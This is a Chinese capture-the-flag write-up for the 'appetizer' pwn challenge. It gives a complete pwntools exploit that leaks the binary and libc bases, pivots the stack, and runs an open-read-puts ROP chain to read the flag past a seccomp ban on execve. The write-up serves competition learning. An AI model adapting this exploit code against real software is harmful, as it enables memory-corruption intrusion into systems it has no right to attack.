DASCTF X CBCTF 2022九月挑战赛 appetizer

程序分析

1. 开启了沙盒ban了execve
2. fun函数可以覆盖到rbp的位置

3. check函数会检查该位置是否有下面的字符串，小端序记得反过来写

4. 白给了程序的一个地址(end)，通过减去偏移拿到程序的基地址
5. 调试发现最后一个read可以改写rbp以及rsp

思路

1. func函数可以让我们改写rbp，且通过最后一个read可以实现任意地址写入0x10的数据，但是开启了pie，且我们是后面才拿到的程序基地址且禁止了系统调用，所以打orw
2. 将rop链布置到end中，泄露出libc地址，通过最后一个read进行栈迁移
3. 在第一个链中输出完之后再执行一个read向end写入第二个rop链
4. 第二个rop链就是常规的open，read，puts了

注：orw：在这里指代程序开启了orw，采用open打开flag再写入内存，最后输出的利用

exp

from pwn import *
context.update(os='linux',arch='amd64',log_level='debug')
#c=remote(b'node4.buuoj.cn',29430)
c=process(b'./appetizer')

libc=ELF(b'./libs/2.31-0ubuntu9_amd64/libc-2.31.so')
elf=ELF(b'./appetizer')

gdb.attach(c,'''




''')


c.sendafter(b'identity\n',b'aaNameless')

c.recvuntil(b'are:')
addr_base=int(c.recv(14),16)-0x4050

pop_rdi=addr_base+0x14d3
pop_rsi_xxx=addr_base+0x14d1
leave_ret=addr_base+0x12d8
ret=addr_base+0x101a
write_got=elf.got['write']
write_plt=elf.plt['write']
end=addr_base+0x4050

#length=0xe0
py=p64(pop_rdi)+p64(1)+p64(pop_rsi_xxx)+p64(addr_base+write_got)+p64(0)+p64(addr_base+write_plt)+p64(ret)*21+p64(addr_base+0x1428)

#start_length=0xe0
py+=p64(end-8)+p64(leave_ret)+p64(0)

#start_length=0xf8
py+=b'./flag\x00\x00'

c.sendafter(b'on it\n',py)

py=p64(end-8)+p64(leave_ret)
c.sendafter(b'wish:\n',py)

libc_base=u64(c.recv(6).ljust(8,b'\x00'))-libc.sym['write']
log.success("libc_base="+hex(libc_base))


pop_rsi=libc_base+0x27529
pop_rdx_xxx=libc_base+0x11c1e1
open_addr=libc_base+libc.sym['open']
read_addr=libc_base+libc.sym['read']
puts_addr=libc_base+libc.sym['puts']

orw=p64(pop_rdi)+p64(end+0xf8)+p64(pop_rsi)+p64(0)+p64(open_addr)
orw+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(end+0x100)+p64(pop_rdx_xxx)+p64(0x40)+p64(0)+p64(read_addr)
orw+=p64(pop_rdi)+p64(end+0x100)+p64(puts_addr)

c.send(orw)
c.send(b'a')



c.interactive()

others部分

1. 官方给出的第一个wp利用的是csu，应该是为了控制rdx，但是我们泄露libc的时候最后一个read存入rdx的值为0x10完全够用所以就不用csu了
2. 第一个rop链中的大量ret目的是抬高栈，原因是第一条链布置完执行的read的时候，我们又是在同一个地方写入内容导致改写了read后面返回时布置的内容，这会导致程序出错，如果把p64(ret)*21删除则，read后rip拿到的值就是我们第二条链中的3